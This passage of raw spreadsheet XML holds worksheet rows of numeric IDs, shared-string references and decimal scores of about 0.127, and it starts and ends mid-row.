      <c r="C23721" s="2" t="s">
        <v>22870</v>
      </c>
      <c r="D23721" s="2">
        <v>1.0</v>
      </c>
      <c r="E23721" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23721" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23722" ht="15.75" customHeight="1">
      <c r="A23722" s="1">
        <v>17597.0</v>
      </c>
      <c r="B23722" s="2">
        <v>5.0334252E7</v>
      </c>
      <c r="C23722" s="2" t="s">
        <v>22871</v>
      </c>
      <c r="D23722" s="2">
        <v>1.0</v>
      </c>
      <c r="E23722" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23722" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23723" ht="15.75" customHeight="1">
      <c r="A23723" s="1">
        <v>19424.0</v>
      </c>
      <c r="B23723" s="2">
        <v>5.5664422E7</v>
      </c>
      <c r="C23723" s="2" t="s">
        <v>22872</v>
      </c>
      <c r="D23723" s="2">
        <v>1.0</v>
      </c>
      <c r="E23723" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23723" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23724" ht="15.75" customHeight="1">
      <c r="A23724" s="1">
        <v>19640.0</v>
      </c>
      <c r="B23724" s="2">
        <v>5.6282151E7</v>
      </c>
      <c r="C23724" s="2" t="s">
        <v>22873</v>
      </c>
      <c r="D23724" s="2">
        <v>1.0</v>
      </c>
      <c r="E23724" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23724" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23725" ht="15.75" customHeight="1">
      <c r="A23725" s="1">
        <v>19681.0</v>
      </c>
      <c r="B23725" s="2">
        <v>5.6450139E7</v>
      </c>
      <c r="C23725" s="2" t="s">
        <v>22874</v>
      </c>
      <c r="D23725" s="2">
        <v>1.0</v>
      </c>
      <c r="E23725" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23725" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23726" ht="15.75" customHeight="1">
      <c r="A23726" s="1">
        <v>20225.0</v>
      </c>
      <c r="B23726" s="2">
        <v>1.0782108E7</v>
      </c>
      <c r="C23726" s="2" t="s">
        <v>22875</v>
      </c>
      <c r="D23726" s="2">
        <v>1.0</v>
      </c>
      <c r="E23726" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23726" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23727" ht="15.75" customHeight="1">
      <c r="A23727" s="1">
        <v>20647.0</v>
      </c>
      <c r="B23727" s="2">
        <v>1.4254501E7</v>
      </c>
      <c r="C23727" s="2" t="s">
        <v>22876</v>
      </c>
      <c r="D23727" s="2">
        <v>1.0</v>
      </c>
      <c r="E23727" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23727" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23728" ht="15.75" customHeight="1">
      <c r="A23728" s="1">
        <v>20811.0</v>
      </c>
      <c r="B23728" s="2">
        <v>1.5331752E7</v>
      </c>
      <c r="C23728" s="2" t="s">
        <v>22877</v>
      </c>
      <c r="D23728" s="2">
        <v>1.0</v>
      </c>
      <c r="E23728" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23728" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23729" ht="15.75" customHeight="1">
      <c r="A23729" s="1">
        <v>21205.0</v>
      </c>
      <c r="B23729" s="2">
        <v>1.9525634E7</v>
      </c>
      <c r="C23729" s="2" t="s">
        <v>22878</v>
      </c>
      <c r="D23729" s="2">
        <v>1.0</v>
      </c>
      <c r="E23729" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23729" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23730" ht="15.75" customHeight="1">
      <c r="A23730" s="1">
        <v>22901.0</v>
      </c>
      <c r="B23730" s="2">
        <v>4.7990184E7</v>
      </c>
      <c r="C23730" s="2" t="s">
        <v>22879</v>
      </c>
      <c r="D23730" s="2">
        <v>1.0</v>
      </c>
      <c r="E23730" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23730" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23731" ht="15.75" customHeight="1">
      <c r="A23731" s="1">
        <v>23518.0</v>
      </c>
      <c r="B23731" s="2">
        <v>5840302.0</v>
      </c>
      <c r="C23731" s="2" t="s">
        <v>22880</v>
      </c>
      <c r="D23731" s="2">
        <v>1.0</v>
      </c>
      <c r="E23731" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23731" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23732" ht="15.75" customHeight="1">
      <c r="A23732" s="1">
        <v>23581.0</v>
      </c>
      <c r="B23732" s="2">
        <v>6269982.0</v>
      </c>
      <c r="C23732" s="2" t="s">
        <v>22881</v>
      </c>
      <c r="D23732" s="2">
        <v>1.0</v>
      </c>
      <c r="E23732" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23732" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23733" ht="15.75" customHeight="1">
      <c r="A23733" s="1">
        <v>23697.0</v>
      </c>
      <c r="B23733" s="2">
        <v>7073033.0</v>
      </c>
      <c r="C23733" s="2" t="s">
        <v>22882</v>
      </c>
      <c r="D23733" s="2">
        <v>1.0</v>
      </c>
      <c r="E23733" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23733" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23734" ht="15.75" customHeight="1">
      <c r="A23734" s="1">
        <v>24024.0</v>
      </c>
      <c r="B23734" s="2">
        <v>9382888.0</v>
      </c>
      <c r="C23734" s="2" t="s">
        <v>22883</v>
      </c>
      <c r="D23734" s="2">
        <v>1.0</v>
      </c>
      <c r="E23734" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23734" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23735" ht="15.75" customHeight="1">
      <c r="A23735" s="1">
        <v>24492.0</v>
      </c>
      <c r="B23735" s="2">
        <v>1.1079281E7</v>
      </c>
      <c r="C23735" s="2" t="s">
        <v>22884</v>
      </c>
      <c r="D23735" s="2">
        <v>1.0</v>
      </c>
      <c r="E23735" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23735" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23736" ht="15.75" customHeight="1">
      <c r="A23736" s="1">
        <v>24682.0</v>
      </c>
      <c r="B23736" s="2">
        <v>1.1603236E7</v>
      </c>
      <c r="C23736" s="2" t="s">
        <v>22885</v>
      </c>
      <c r="D23736" s="2">
        <v>1.0</v>
      </c>
      <c r="E23736" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23736" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23737" ht="15.75" customHeight="1">
      <c r="A23737" s="1">
        <v>26343.0</v>
      </c>
      <c r="B23737" s="2">
        <v>1.677666E7</v>
      </c>
      <c r="C23737" s="2" t="s">
        <v>22886</v>
      </c>
      <c r="D23737" s="2">
        <v>1.0</v>
      </c>
      <c r="E23737" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23737" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23738" ht="15.75" customHeight="1">
      <c r="A23738" s="1">
        <v>26935.0</v>
      </c>
      <c r="B23738" s="2">
        <v>1.9525633E7</v>
      </c>
      <c r="C23738" s="2" t="s">
        <v>22878</v>
      </c>
      <c r="D23738" s="2">
        <v>1.0</v>
      </c>
      <c r="E23738" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23738" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23739" ht="15.75" customHeight="1">
      <c r="A23739" s="1">
        <v>27622.0</v>
      </c>
      <c r="B23739" s="2">
        <v>2.2686181E7</v>
      </c>
      <c r="C23739" s="2" t="s">
        <v>22887</v>
      </c>
      <c r="D23739" s="2">
        <v>1.0</v>
      </c>
      <c r="E23739" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23739" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23740" ht="15.75" customHeight="1">
      <c r="A23740" s="1">
        <v>27831.0</v>
      </c>
      <c r="B23740" s="2">
        <v>2.3406142E7</v>
      </c>
      <c r="C23740" s="2" t="s">
        <v>22888</v>
      </c>
      <c r="D23740" s="2">
        <v>1.0</v>
      </c>
      <c r="E23740" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23740" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23741" ht="15.75" customHeight="1">
      <c r="A23741" s="1">
        <v>27834.0</v>
      </c>
      <c r="B23741" s="2">
        <v>2.3406142E7</v>
      </c>
      <c r="C23741" s="2" t="s">
        <v>22889</v>
      </c>
      <c r="D23741" s="2">
        <v>1.0</v>
      </c>
      <c r="E23741" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23741" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23742" ht="15.75" customHeight="1">
      <c r="A23742" s="1">
        <v>28022.0</v>
      </c>
      <c r="B23742" s="2">
        <v>2.4389414E7</v>
      </c>
      <c r="C23742" s="2" t="s">
        <v>22890</v>
      </c>
      <c r="D23742" s="2">
        <v>1.0</v>
      </c>
      <c r="E23742" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23742" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23743" ht="15.75" customHeight="1">
      <c r="A23743" s="1">
        <v>28515.0</v>
      </c>
      <c r="B23743" s="2">
        <v>2.6749857E7</v>
      </c>
      <c r="C23743" s="2" t="s">
        <v>22891</v>
      </c>
      <c r="D23743" s="2">
        <v>1.0</v>
      </c>
      <c r="E23743" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23743" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23744" ht="15.75" customHeight="1">
      <c r="A23744" s="1">
        <v>28626.0</v>
      </c>
      <c r="B23744" s="2">
        <v>2.71738E7</v>
      </c>
      <c r="C23744" s="2" t="s">
        <v>22892</v>
      </c>
      <c r="D23744" s="2">
        <v>1.0</v>
      </c>
      <c r="E23744" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23744" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23745" ht="15.75" customHeight="1">
      <c r="A23745" s="1">
        <v>28833.0</v>
      </c>
      <c r="B23745" s="2">
        <v>2.8874864E7</v>
      </c>
      <c r="C23745" s="2" t="s">
        <v>22893</v>
      </c>
      <c r="D23745" s="2">
        <v>1.0</v>
      </c>
      <c r="E23745" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23745" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23746" ht="15.75" customHeight="1">
      <c r="A23746" s="1">
        <v>29456.0</v>
      </c>
      <c r="B23746" s="2">
        <v>3.2249452E7</v>
      </c>
      <c r="C23746" s="2" t="s">
        <v>22894</v>
      </c>
      <c r="D23746" s="2">
        <v>1.0</v>
      </c>
      <c r="E23746" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23746" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23747" ht="15.75" customHeight="1">
      <c r="A23747" s="1">
        <v>30359.0</v>
      </c>
      <c r="B23747" s="2">
        <v>3.8290738E7</v>
      </c>
      <c r="C23747" s="2" t="s">
        <v>22895</v>
      </c>
      <c r="D23747" s="2">
        <v>1.0</v>
      </c>
      <c r="E23747" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23747" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23748" ht="15.75" customHeight="1">
      <c r="A23748" s="1">
        <v>30868.0</v>
      </c>
      <c r="B23748" s="2">
        <v>4.6234133E7</v>
      </c>
      <c r="C23748" s="2" t="s">
        <v>22896</v>
      </c>
      <c r="D23748" s="2">
        <v>1.0</v>
      </c>
      <c r="E23748" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23748" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23749" ht="15.75" customHeight="1">
      <c r="A23749" s="1">
        <v>31699.0</v>
      </c>
      <c r="B23749" s="2">
        <v>5197170.0</v>
      </c>
      <c r="C23749" s="2" t="s">
        <v>22897</v>
      </c>
      <c r="D23749" s="2">
        <v>1.0</v>
      </c>
      <c r="E23749" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23749" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23750" ht="15.75" customHeight="1">
      <c r="A23750" s="1">
        <v>32544.0</v>
      </c>
      <c r="B23750" s="2">
        <v>5750098.0</v>
      </c>
      <c r="C23750" s="2" t="s">
        <v>22898</v>
      </c>
      <c r="D23750" s="2">
        <v>1.0</v>
      </c>
      <c r="E23750" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23750" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23751" ht="15.75" customHeight="1">
      <c r="A23751" s="1">
        <v>32656.0</v>
      </c>
      <c r="B23751" s="2">
        <v>5900511.0</v>
      </c>
      <c r="C23751" s="2" t="s">
        <v>22899</v>
      </c>
      <c r="D23751" s="2">
        <v>1.0</v>
      </c>
      <c r="E23751" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23751" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23752" ht="15.75" customHeight="1">
      <c r="A23752" s="1">
        <v>32855.0</v>
      </c>
      <c r="B23752" s="2">
        <v>6269981.0</v>
      </c>
      <c r="C23752" s="2" t="s">
        <v>22881</v>
      </c>
      <c r="D23752" s="2">
        <v>1.0</v>
      </c>
      <c r="E23752" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23752" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23753" ht="15.75" customHeight="1">
      <c r="A23753" s="1">
        <v>33789.0</v>
      </c>
      <c r="B23753" s="2">
        <v>8755891.0</v>
      </c>
      <c r="C23753" s="2" t="s">
        <v>22900</v>
      </c>
      <c r="D23753" s="2">
        <v>1.0</v>
      </c>
      <c r="E23753" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23753" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="23754" ht="15.75" customHeight="1">
      <c r="A23754" s="1">
        <v>8000.0</v>
      </c>
      <c r="B23754" s="2">
        <v>5.2777186E7</v>
      </c>
      <c r="C23754" s="2" t="s">
        <v>22901</v>
      </c>
      <c r="D23754" s="2">
        <v>1.0</v>
      </c>
      <c r="E23754" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23754" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="23755" ht="15.75" customHeight="1">
      <c r="A23755" s="1">
        <v>12649.0</v>
      </c>
      <c r="B23755" s="2">
        <v>3.0387219E7</v>
      </c>
      <c r="C23755" s="2" t="s">
        <v>22902</v>
      </c>
      <c r="D23755" s="2">
        <v>1.0</v>
      </c>
      <c r="E23755" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23755" s="2">
        <v>0.1277777777777778</v>
      </c>
    </row>
    <row r="23756" ht="15.75" customHeight="1">
      <c r="A23756" s="1">
        <v>20950.0</v>
      </c>
      <c r="B23756" s="2">
        <v>1.6617393E7</v>
      </c>
      <c r="C23756" s="2" t="s">
        <v>22903</v>
      </c>
      <c r="D23756" s="2">
        <v>1.0</v>
      </c>
      <c r="E23756" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23756" s="2">
        <v>0.1277777777777778</v>
      </c>
    </row>
    <row r="23757" ht="15.75" customHeight="1">
      <c r="A23757" s="1">
        <v>28952.0</v>
      </c>
      <c r="B23757" s="2">
        <v>2.9720701E7</v>
      </c>
      <c r="C23757" s="2" t="s">
        <v>22904</v>
      </c>
      <c r="D23757" s="2">
        <v>1.0</v>
      </c>
      <c r="E23757" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23757" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="23758" ht="15.75" customHeight="1">
      <c r="A23758" s="1">
        <v>22384.0</v>
      </c>
      <c r="B23758" s="2">
        <v>3.5223121E7</v>
      </c>
      <c r="C23758" s="2" t="s">
        <v>22905</v>
      </c>
      <c r="D23758" s="2">
        <v>1.0</v>
      </c>
      <c r="E23758" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23758" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="23759" ht="15.75" customHeight="1">
      <c r="A23759" s="1">
        <v>25374.0</v>
      </c>
      <c r="B23759" s="2">
        <v>1.3617404E7</v>
      </c>
      <c r="C23759" s="2" t="s">
        <v>22906</v>
      </c>
      <c r="D23759" s="2">
        <v>1.0</v>
      </c>
      <c r="E23759" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23759" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="23760" ht="15.75" customHeight="1">
      <c r="A23760" s="1">
        <v>27030.0</v>
      </c>
      <c r="B23760" s="2">
        <v>2.0065395E7</v>
      </c>
      <c r="C23760" s="2" t="s">
        <v>22907</v>
      </c>
      <c r="D23760" s="2">
        <v>1.0</v>
      </c>
      <c r="E23760" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23760" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="23761" ht="15.75" customHeight="1">
      <c r="A23761" s="1">
        <v>31290.0</v>
      </c>
      <c r="B23761" s="2">
        <v>4962052.0</v>
      </c>
      <c r="C23761" s="2" t="s">
        <v>22908</v>
      </c>
      <c r="D23761" s="2">
        <v>1.0</v>
      </c>
      <c r="E23761" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23761" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="23762" ht="15.75" customHeight="1">
      <c r="A23762" s="1">
        <v>16109.0</v>
      </c>
      <c r="B23762" s="2">
        <v>4.5399501E7</v>
      </c>
      <c r="C23762" s="2" t="s">
        <v>22909</v>
      </c>
      <c r="D23762" s="2">
        <v>1.0</v>
      </c>
      <c r="E23762" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23762" s="2">
        <v>0.1275430359937403</v>
      </c>
    </row>
    <row r="23763" ht="15.75" customHeight="1">
      <c r="A23763" s="1">
        <v>32255.0</v>
      </c>
      <c r="B23763" s="2">
        <v>5.5091918E7</v>
      </c>
      <c r="C23763" s="2" t="s">
        <v>22842</v>
      </c>
      <c r="D23763" s="2">
        <v>1.0</v>
      </c>
      <c r="E23763" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23763" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="23764" ht="15.75" customHeight="1">
      <c r="A23764" s="1">
        <v>22467.0</v>
      </c>
      <c r="B23764" s="2">
        <v>3.6651553E7</v>
      </c>
      <c r="C23764" s="2" t="s">
        <v>22720</v>
      </c>
      <c r="D23764" s="2">
        <v>1.0</v>
      </c>
      <c r="E23764" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23764" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="23765" ht="15.75" customHeight="1">
      <c r="A23765" s="1">
        <v>32608.0</v>
      </c>
      <c r="B23765" s="2">
        <v>5825533.0</v>
      </c>
      <c r="C23765" s="2" t="s">
        <v>22910</v>
      </c>
      <c r="D23765" s="2">
        <v>1.0</v>
      </c>
      <c r="E23765" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23765" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="23766" ht="15.75" customHeight="1">
      <c r="A23766" s="1">
        <v>22981.0</v>
      </c>
      <c r="B23766" s="2">
        <v>4.9293343E7</v>
      </c>
      <c r="C23766" s="2" t="s">
        <v>22911</v>
      </c>
      <c r="D23766" s="2">
        <v>1.0</v>
      </c>
      <c r="E23766" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23766" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="23767" ht="15.75" customHeight="1">
      <c r="A23767" s="1">
        <v>26115.0</v>
      </c>
      <c r="B23767" s="2">
        <v>1.5858238E7</v>
      </c>
      <c r="C23767" s="2" t="s">
        <v>22912</v>
      </c>
      <c r="D23767" s="2">
        <v>1.0</v>
      </c>
      <c r="E23767" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23767" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="23768" ht="15.75" customHeight="1">
      <c r="A23768" s="1">
        <v>29559.0</v>
      </c>
      <c r="B23768" s="2">
        <v>3.316521E7</v>
      </c>
      <c r="C23768" s="2" t="s">
        <v>22913</v>
      </c>
      <c r="D23768" s="2">
        <v>1.0</v>
      </c>
      <c r="E23768" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23768" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="23769" ht="15.75" customHeight="1">
      <c r="A23769" s="1">
        <v>31002.0</v>
      </c>
      <c r="B23769" s="2">
        <v>4.7619643E7</v>
      </c>
      <c r="C23769" s="2" t="s">
        <v>22914</v>
      </c>
      <c r="D23769" s="2">
        <v>1.0</v>
      </c>
      <c r="E23769" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23769" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="23770" ht="15.75" customHeight="1">
      <c r="A23770" s="1">
        <v>31288.0</v>
      </c>
      <c r="B23770" s="2">
        <v>4962052.0</v>
      </c>
      <c r="C23770" s="2" t="s">
        <v>22915</v>
      </c>
      <c r="D23770" s="2">
        <v>1.0</v>
      </c>
      <c r="E23770" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23770" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="23771" ht="15.75" customHeight="1">
      <c r="A23771" s="1">
        <v>21369.0</v>
      </c>
      <c r="B23771" s="2">
        <v>2.1553312E7</v>
      </c>
      <c r="C23771" s="2" t="s">
        <v>22916</v>
      </c>
      <c r="D23771" s="2">
        <v>1.0</v>
      </c>
      <c r="E23771" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23771" s="2">
        <v>0.1268518518518518</v>
      </c>
    </row>
    <row r="23772" ht="15.75" customHeight="1">
      <c r="A23772" s="1">
        <v>1688.0</v>
      </c>
      <c r="B23772" s="2">
        <v>2.8446797E7</v>
      </c>
      <c r="C23772" s="2" t="s">
        <v>22917</v>
      </c>
      <c r="D23772" s="2">
        <v>1.0</v>
      </c>
      <c r="E23772" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23772" s="2">
        <v>0.1266666666666667</v>
      </c>
    </row>
    <row r="23773" ht="15.75" customHeight="1">
      <c r="A23773" s="1">
        <v>32590.0</v>
      </c>
      <c r="B23773" s="2">
        <v>5802568.0</v>
      </c>
      <c r="C23773" s="2" t="s">
        <v>22918</v>
      </c>
      <c r="D23773" s="2">
        <v>1.0</v>
      </c>
      <c r="E23773" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23773" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="23774" ht="15.75" customHeight="1">
      <c r="A23774" s="1">
        <v>32723.0</v>
      </c>
      <c r="B23774" s="2">
        <v>5984823.0</v>
      </c>
      <c r="C23774" s="2" t="s">
        <v>22919</v>
      </c>
      <c r="D23774" s="2">
        <v>1.0</v>
      </c>
      <c r="E23774" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23774" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="23775" ht="15.75" customHeight="1">
      <c r="A23775" s="1">
        <v>20416.0</v>
      </c>
      <c r="B23775" s="2">
        <v>1.2236109E7</v>
      </c>
      <c r="C23775" s="2" t="s">
        <v>22920</v>
      </c>
      <c r="D23775" s="2">
        <v>1.0</v>
      </c>
      <c r="E23775" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23775" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="23776" ht="15.75" customHeight="1">
      <c r="A23776" s="1">
        <v>20546.0</v>
      </c>
      <c r="B23776" s="2">
        <v>1.3380154E7</v>
      </c>
      <c r="C23776" s="2" t="s">
        <v>22921</v>
      </c>
      <c r="D23776" s="2">
        <v>1.0</v>
      </c>
      <c r="E23776" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23776" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="23777" ht="15.75" customHeight="1">
      <c r="A23777" s="1">
        <v>21842.0</v>
      </c>
      <c r="B23777" s="2">
        <v>2.7128926E7</v>
      </c>
      <c r="C23777" s="2" t="s">
        <v>22922</v>
      </c>
      <c r="D23777" s="2">
        <v>1.0</v>
      </c>
      <c r="E23777" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23777" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="23778" ht="15.75" customHeight="1">
      <c r="A23778" s="1">
        <v>9364.0</v>
      </c>
      <c r="B23778" s="2">
        <v>5.5680848E7</v>
      </c>
      <c r="C23778" s="5" t="s">
        <v>22923</v>
      </c>
      <c r="D23778" s="2">
        <v>1.0</v>
      </c>
      <c r="E23778" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23778" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="23779" ht="15.75" customHeight="1">
      <c r="A23779" s="1">
        <v>11638.0</v>
      </c>
      <c r="B23779" s="2">
        <v>2.3188192E7</v>
      </c>
      <c r="C23779" s="2" t="s">
        <v>22924</v>
      </c>
      <c r="D23779" s="2">
        <v>1.0</v>
      </c>
      <c r="E23779" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23779" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="23780" ht="15.75" customHeight="1">
      <c r="A23780" s="1">
        <v>11832.0</v>
      </c>
      <c r="B23780" s="2">
        <v>2.4668896E7</v>
      </c>
      <c r="C23780" s="2" t="s">
        <v>22925</v>
      </c>
      <c r="D23780" s="2">
        <v>1.0</v>
      </c>
      <c r="E23780" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23780" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="23781" ht="15.75" customHeight="1">
      <c r="A23781" s="1">
        <v>13806.0</v>
      </c>
      <c r="B23781" s="2">
        <v>3.666034E7</v>
      </c>
      <c r="C23781" s="2" t="s">
        <v>22926</v>
      </c>
      <c r="D23781" s="2">
        <v>1.0</v>
      </c>
      <c r="E23781" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23781" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="23782" ht="15.75" customHeight="1">
      <c r="A23782" s="1">
        <v>19829.0</v>
      </c>
      <c r="B23782" s="2">
        <v>5.7048533E7</v>
      </c>
      <c r="C23782" s="2" t="s">
        <v>22927</v>
      </c>
      <c r="D23782" s="2">
        <v>1.0</v>
      </c>
      <c r="E23782" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23782" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="23783" ht="15.75" customHeight="1">
      <c r="A23783" s="1">
        <v>27613.0</v>
      </c>
      <c r="B23783" s="2">
        <v>2.2647882E7</v>
      </c>
      <c r="C23783" s="2" t="s">
        <v>22928</v>
      </c>
      <c r="D23783" s="2">
        <v>1.0</v>
      </c>
      <c r="E23783" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23783" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="23784" ht="15.75" customHeight="1">
      <c r="A23784" s="1">
        <v>29776.0</v>
      </c>
      <c r="B23784" s="2">
        <v>3.4980789E7</v>
      </c>
      <c r="C23784" s="2" t="s">
        <v>22929</v>
      </c>
      <c r="D23784" s="2">
        <v>1.0</v>
      </c>
      <c r="E23784" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23784" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="23785" ht="15.75" customHeight="1">
      <c r="A23785" s="1">
        <v>22056.0</v>
      </c>
      <c r="B23785" s="2">
        <v>3.0432802E7</v>
      </c>
      <c r="C23785" s="2" t="s">
        <v>22930</v>
      </c>
      <c r="D23785" s="2">
        <v>1.0</v>
      </c>
      <c r="E23785" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23785" s="2">
        <v>0.1261904761904762</v>
      </c>
    </row>
    <row r="23786" ht="15.75" customHeight="1">
      <c r="A23786" s="1">
        <v>30848.0</v>
      </c>
      <c r="B23786" s="2">
        <v>4.5918036E7</v>
      </c>
      <c r="C23786" s="2" t="s">
        <v>22931</v>
      </c>
      <c r="D23786" s="2">
        <v>1.0</v>
      </c>
      <c r="E23786" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23786" s="2">
        <v>0.1261904761904762</v>
      </c>
    </row>
    <row r="23787" ht="15.75" customHeight="1">
      <c r="A23787" s="1">
        <v>16029.0</v>
      </c>
      <c r="B23787" s="2">
        <v>4.5103925E7</v>
      </c>
      <c r="C23787" s="2" t="s">
        <v>22932</v>
      </c>
      <c r="D23787" s="2">
        <v>1.0</v>
      </c>
      <c r="E23787" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23787" s="2">
        <v>0.1261022927689595</v>
      </c>
    </row>
    <row r="23788" ht="15.75" customHeight="1">
      <c r="A23788" s="1">
        <v>10394.0</v>
      </c>
      <c r="B23788" s="2">
        <v>9044754.0</v>
      </c>
      <c r="C23788" s="2" t="s">
